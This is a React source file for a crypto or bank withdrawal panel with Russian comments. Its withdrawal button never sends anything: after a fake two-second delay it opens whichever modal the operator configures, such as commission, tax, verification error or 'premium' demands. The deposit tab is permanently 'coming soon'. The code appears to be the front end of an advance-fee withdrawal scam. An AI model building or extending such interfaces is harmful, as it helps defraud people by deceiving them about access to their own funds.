import React, { useState, useEffect, useRef } from 'react';
import s from './NovaWithdrawPanel.module.sass';
import { useAppContext } from '../../../app-core/AppContext';
import BankLogo from '../components/BankLogo';
import { ChevronDown, ArrowUp, Check, X, Inbox, CreditCard, Landmark, User, ArrowDownToLine, ArrowUpFromLine, Banknote, FileText } from 'lucide-react';

/**
 * NovaWithdrawPanel — нативная для Nova панель депозита/вывода.
 * Повторяет поведение классического ToggleSwitch (авторасчёт криптовалюты,
 * машина состояний кнопки, sendButtonBehavior → открытие нужного модала),
 * но свёрстана в дизайн-системе Nova (Linear-формы: mono-лейблы,
 * hairline-инпуты, один акцент).
 */
export default function NovaWithdrawPanel({ availableMoney }) {
    const {
        nameUser,
        adressCrypto, setAdressCrypto,
        network, setNetwork, networks,
        imgCoin, setImgCoin,
        bnbBalanca, setBnbBalanca,
        maxTotalMoney, customMaxMoney,
        selectedCrypto, cryptoOptions = [],
        calculateCryptoAmount,
        siteSettings = {},
        setshowVerifyModal, setSendingErrorModal, setShowModaWithdrawal,
        setshowNalogModal, setShowCryptoConversionModal, setShowBankConversionModal,
        setShowPremiumModal, setCustomModalState,
        showVerifyModal, sendingErrorModal, showModaWithdrawal, showNalogModal,
        showCryptoConversionModal, showBankConversionModal, showPremiumModal,
        safeT,
    } = useAppContext();

    const t = typeof safeT === 'function' ? safeT : (_k, f) => f;
    const currencyFormat = siteSettings.currencyFormat || 'RM';

    const [activeTab, setActiveTab] = useState('withdrawal');
    const [selectedCoin, setSelectedCoin] = useState(selectedCrypto || 'ETH');
    const [networkDropdownOpen, setNetworkDropdownOpen] = useState(false);
    const bankSelectRef = useRef(null);
    // Закрываем дропдаун банка по клику вне его области
    useEffect(() => {
        if (!networkDropdownOpen) return undefined;
        const onDocMouseDown = (e) => {
            if (bankSelectRef.current && !bankSelectRef.current.contains(e.target)) {
                setNetworkDropdownOpen(false);
            }
        };
        document.addEventListener('mousedown', onDocMouseDown, true);
        return () => document.removeEventListener('mousedown', onDocMouseDown, true);
    }, [networkDropdownOpen]);
    const [buttonState, setButtonState] = useState('default');

    const formatCrypto = (number, decimalPlaces = 5) => {
        if (isNaN(number) || number === null || number === undefined) return '0.' + '0'.repeat(decimalPlaces);
        return parseFloat(number).toFixed(decimalPlaces);
    };

    const formatMoney = (value) => String(value ?? 0).replace(/\B(?=(\d{3})+(?!\d))/g, ',');

    // Банки: только включённые в настройках, по приоритету
    const enabledNetworks = (networks || [])
        .filter(net => siteSettings.banks?.[net.name]?.enabled !== false)
        .sort((a, b) => (siteSettings.banks?.[a.name]?.priority || 999) - (siteSettings.banks?.[b.name]?.priority || 999));

    // Синхронизация выбранной монеты с глобальной
    useEffect(() => {
        if (selectedCrypto && selectedCrypto !== selectedCoin) {
            setSelectedCoin(selectedCrypto);
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [selectedCrypto]);

    // Авторасчёт количества криптовалюты из фиатной суммы (как в оригинале)
    useEffect(() => {
        if (calculateCryptoAmount && selectedCrypto) {
            const amountToUse = customMaxMoney
                ? parseFloat(customMaxMoney)
                : parseFloat(String(maxTotalMoney).replace(/,/g, ''));
            if (amountToUse > 0 && !isNaN(amountToUse)) {
                const cryptoAmount = calculateCryptoAmount(amountToUse, selectedCrypto);
                const formatted = formatCrypto(parseFloat(cryptoAmount), siteSettings?.cryptoDecimalPlaces || 5);
                if (String(bnbBalanca).replace(/,/g, '.') !== formatted) {
                    setBnbBalanca(formatted);
                }
            }
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [customMaxMoney, maxTotalMoney, selectedCrypto, calculateCryptoAmount, siteSettings?.cryptoDecimalPlaces]);

    // Сброс кнопки после закрытия модалов
    useEffect(() => {
        const behavior = siteSettings?.sendButtonBehavior || 'default';
        if (behavior !== 'default' && buttonState !== 'default' && buttonState !== 'loading') {
            const anyModalOpen = showVerifyModal || sendingErrorModal || showModaWithdrawal ||
                showNalogModal || showCryptoConversionModal || showBankConversionModal || showPremiumModal;
            if (!anyModalOpen) setButtonState('default');
        }
    }, [showVerifyModal, sendingErrorModal, showModaWithdrawal, showNalogModal,
        showCryptoConversionModal, showBankConversionModal, showPremiumModal, buttonState, siteSettings?.sendButtonBehavior]);

    const handleConvertAndSend = () => {
        if (buttonState !== 'default') return;
        setButtonState('loading');
        const behavior = siteSettings?.sendButtonBehavior || 'default';

        setTimeout(() => {
            const builtin = ['showCommission', 'showVerification', 'showSuccess', 'showTax', 'showCryptoConversion', 'showBankConversion', 'showPremium'];
            if (behavior.startsWith('show') && !builtin.includes(behavior)) {
                const actionKey = behavior.replace('show', '').charAt(0).toLowerCase() + behavior.replace('show', '').slice(1);
                const customModal = siteSettings?.modalTemplates?.find(tpl => tpl.actionKey === actionKey);
                if (customModal && setCustomModalState) {
                    setButtonState('error');
                    setCustomModalState(`custom_${actionKey}`, true);
                    return;
                }
            }

            switch (behavior) {
                case 'showCommission':
                    setButtonState('error');
                    setshowVerifyModal && setshowVerifyModal(true);
                    break;
                case 'showVerification':
                    setButtonState('error');
                    setSendingErrorModal && setSendingErrorModal(true);
                    break;
                case 'showSuccess':
                    setButtonState('success');
                    setShowModaWithdrawal && setShowModaWithdrawal(true);
                    break;
                case 'showTax':
                    setButtonState('error');
                    setshowNalogModal && setshowNalogModal(true);
                    break;
                case 'showCryptoConversion':
                    setButtonState('error');
                    setShowCryptoConversionModal && setShowCryptoConversionModal(true);
                    break;
                case 'showBankConversion':
                    setButtonState('error');
                    setShowBankConversionModal && setShowBankConversionModal(true);
                    break;
                case 'showPremium':
                    setButtonState('error');
                    setShowPremiumModal && setShowPremiumModal(true);
                    break;
                default:
                    setButtonState('success');
                    setTimeout(() => setButtonState('default'), 3000);
                    break;
            }
        }, 2000);
    };

    const coins = cryptoOptions.length ? cryptoOptions : [];
    const selectedCoinData = coins.find(c => c.symbol === selectedCoin) || coins[0];
    const shownMoney = availableMoney !== undefined ? availableMoney : maxTotalMoney;

    // Max — подставляет в поле эквивалент всего доступного баланса
    const handleMax = () => {
        const fullFiat = parseFloat(String(shownMoney).replace(/,/g, ''));
        if (!calculateCryptoAmount || !selectedCoin || isNaN(fullFiat) || fullFiat <= 0) return;
        const cryptoAmount = calculateCryptoAmount(fullFiat, selectedCoin);
        setBnbBalanca(formatCrypto(parseFloat(cryptoAmount), siteSettings?.cryptoDecimalPlaces || 5));
    };

    const buttonContent = () => {
        switch (buttonState) {
            case 'loading':
                return (<><span className={s.spinner} aria-hidden="true" />{t('dashboard.processing', 'Обработка')}…</>);
            case 'success':
                return (
                    <>
                        <Check size={15} strokeWidth={2.2} aria-hidden="true" />
                        {t('dashboard.success', 'Успешно')}
                    </>
                );
            case 'error':
                return (
                    <>
                        <X size={15} strokeWidth={2.2} aria-hidden="true" />
                        {t('dashboard.error', 'Ошибка')}
                    </>
                );
            default:
                return (
                    <>
                        <ArrowUp size={15} strokeWidth={2.2} aria-hidden="true" />
                        {t('dashboard.convert', 'Конвертировать')}
                    </>
                );
        }
    };

    return (
        <div className={s.panelWrap}>
            {/* Язычки-вкладки карточки (folder tabs): активная сливается с телом */}
            <div className={s.tabs} role="tablist" aria-label={`${t('dashboard.deposit', 'Депозит')} / ${t('dashboard.withdraw', 'Вывести')}`}>
                <button
                    role="tab"
                    aria-selected={activeTab === 'deposit'}
                    className={`${s.tab} ${activeTab === 'deposit' ? s.tabActive : ''}`}
                    onClick={() => { setActiveTab('deposit'); setButtonState('default'); }}
                >
                    <ArrowDownToLine size={13} strokeWidth={2} aria-hidden="true" />
                    {t('dashboard.deposit', 'Депозит')}
                </button>
                <button
                    role="tab"
                    aria-selected={activeTab === 'withdrawal'}
                    className={`${s.tab} ${activeTab === 'withdrawal' ? s.tabActive : ''}`}
                    onClick={() => { setActiveTab('withdrawal'); setButtonState('default'); }}
                >
                    <ArrowUpFromLine size={13} strokeWidth={2} aria-hidden="true" />
                    {t('dashboard.withdraw', 'Вывод')}
                </button>
            </div>

            <div className={s.panel}>
            {activeTab === 'deposit' ? (
                <div className={s.empty} role="status">
                    <Inbox size={46} strokeWidth={1.3} aria-hidden="true" />
                    <h3 className={s.emptyTitle}>{t('dashboard.comingSoon', 'Скоро появится')} (нет)</h3>
                    <p className={s.emptyDesc}>{t('dashboard.depositDescription', 'Мы работаем над функцией депозита. Пожалуйста, проверьте позже.')}</p>
                </div>
            ) : (
                <div className={s.body}>
                    {/* ── Секция: сумма (iOS grouped list) */}
                    <section className={s.section}>
                        <h3 className={s.sectionTitle}>
                            {t('dashboard.withdrawalAmount', 'Сумма вывода')}
                            <Banknote size={13} strokeWidth={2.1} aria-hidden="true" />
                        </h3>
                        <div className={s.group}>
                            <div className={s.amountRow}>
                                <input
                                    id="nova-amount"
                                    type="text"
                                    inputMode="decimal"
                                    className={s.amountInput}
                                    value={bnbBalanca}
                                    onChange={(e) => setBnbBalanca(e.target.value.replace(/,/g, '.'))}
                                    placeholder={formatCrypto(0, siteSettings?.cryptoDecimalPlaces || 5)}
                                    aria-label={t('dashboard.withdrawalAmount', 'Сумма вывода')}
                                />
                                <button
                                    type="button"
                                    className={s.maxBtn}
                                    onClick={handleMax}
                                >
                                    Max
                                </button>
                                <span className={s.coinChip}>
                                    {selectedCoinData?.icon && <img src={selectedCoinData.icon} alt="" className={s.coinIcon} />}
                                    <span className={s.selectValue}>{selectedCoin}</span>
                                </span>
                            </div>
                            <div className={s.groupRow}>
                                <span>{t('dashboard.availableBalance', 'Доступный баланс')}</span>
                                <span className={s.rowValue}>{currencyFormat} {formatMoney(shownMoney)}</span>
                            </div>
                            <div className={s.groupRow}>
                                <span>{t('dashboard.networkFee', 'Сетевая комиссия')}</span>
                                <span className={s.rowValue}>{currencyFormat} 0.00</span>
                            </div>
                            <div className={`${s.groupRow} ${s.groupRowTotal}`}>
                                <span>{t('dashboard.totalAmount', 'Общая сумма')}</span>
                                <span className={s.rowValue}>{currencyFormat} {formatMoney(shownMoney)}</span>
                            </div>
                        </div>
                    </section>

                    {/* ── Секция: реквизиты */}
                    <section className={s.section}>
                        <h3 className={s.sectionTitle}>
                            {t('dashboard.withdrawalDetails', 'Детали вывода')}
                            <FileText size={13} strokeWidth={2.1} aria-hidden="true" />
                        </h3>
                        <div className={s.group}>
                            {/* Счёт — floating label: подпись лежит в поле и уплывает вверх */}
                            <div className={s.floatRow}>
                                <span className={s.rowIcon}><CreditCard size={15} strokeWidth={1.9} aria-hidden="true" /></span>
                                <div className={s.rowField}>
                                    <input
                                        id="nova-account"
                                        type="text"
                                        className={s.floatInput}
                                        value={adressCrypto}
                                        onChange={(e) => setAdressCrypto && setAdressCrypto(e.target.value)}
                                        placeholder=" "
                                    />
                                    <label className={s.floatLabel} htmlFor="nova-account">{t('dashboard.accountNumber', 'Номер счета')}</label>
                                </div>
                            </div>

                            {/* Банк — значение есть всегда, лейбл закреплён сверху */}
                            <div className={s.floatRow}>
                                {/* Иконка выбранного банка встаёт на плашку слева; Landmark — запасной вариант */}
                                <span className={s.rowIcon}>
                                    {imgCoin?.img
                                        ? <BankLogo src={imgCoin.img} alt="" className={s.rowIconImg} />
                                        : <Landmark size={15} strokeWidth={1.9} aria-hidden="true" />}
                                </span>
                                <div className={s.rowField}>
                                    <div className={s.selectWrap} ref={bankSelectRef}>
                                        <button
                                            type="button"
                                            className={s.floatSelect}
                                            onClick={() => setNetworkDropdownOpen(!networkDropdownOpen)}
                                            aria-expanded={networkDropdownOpen}
                                        >
                                            <span className={s.selectValue}>{network}</span>
                                            <ChevronDown className={`${s.chevron} ${networkDropdownOpen ? s.chevronOpen : ''}`} size={14} strokeWidth={2} aria-hidden="true" />
                                        </button>
                                        {networkDropdownOpen && (
                                            <div className={`${s.dropdown} ${s.dropdownUp}`}>
                                                {enabledNetworks.map((net, i) => (
                                                    <button
                                                        type="button"
                                                        key={i}
                                                        className={`${s.option} ${net.name === network ? s.optionSelected : ''}`}
                                                        onClick={() => { setNetwork(net.name); setImgCoin(net); setNetworkDropdownOpen(false); }}
                                                    >
                                                        <BankLogo src={net.img} alt="" className={s.coinIcon} />
                                                        <span className={s.optionTitle}>{net.name}</span>
                                                        {net.name === network && (
                                                            <Check size={15} strokeWidth={2.2} className={s.optionCheck} aria-hidden="true" />
                                                        )}
                                                    </button>
                                                ))}
                                            </div>
                                        )}
                                    </div>
                                    <span className={`${s.floatLabel} ${s.floatLabelUp}`}>{t('dashboard.bankWallet', 'Банк / Кошелек')}</span>
                                </div>
                            </div>

                            {/* Имя получателя */}
                            <div className={s.floatRow}>
                                <span className={s.rowIcon}><User size={15} strokeWidth={1.9} aria-hidden="true" /></span>
                                <div className={s.rowField}>
                                    <input
                                        id="nova-recipient"
                                        type="text"
                                        className={s.floatInput}
                                        value={nameUser}
                                        placeholder=" "
                                        readOnly
                                    />
                                    <label className={s.floatLabel} htmlFor="nova-recipient">{t('dashboard.recipientName', 'Имя получателя')}</label>
                                </div>
                            </div>
                        </div>
                    </section>

                    <button
                        type="button"
                        className={`${s.submit} ${s[buttonState]}`}
                        onClick={handleConvertAndSend}
                        disabled={buttonState !== 'default'}
                    >
                        {buttonContent()}
                    </button>
                </div>
            )}
            </div>
        </div>
    );
}
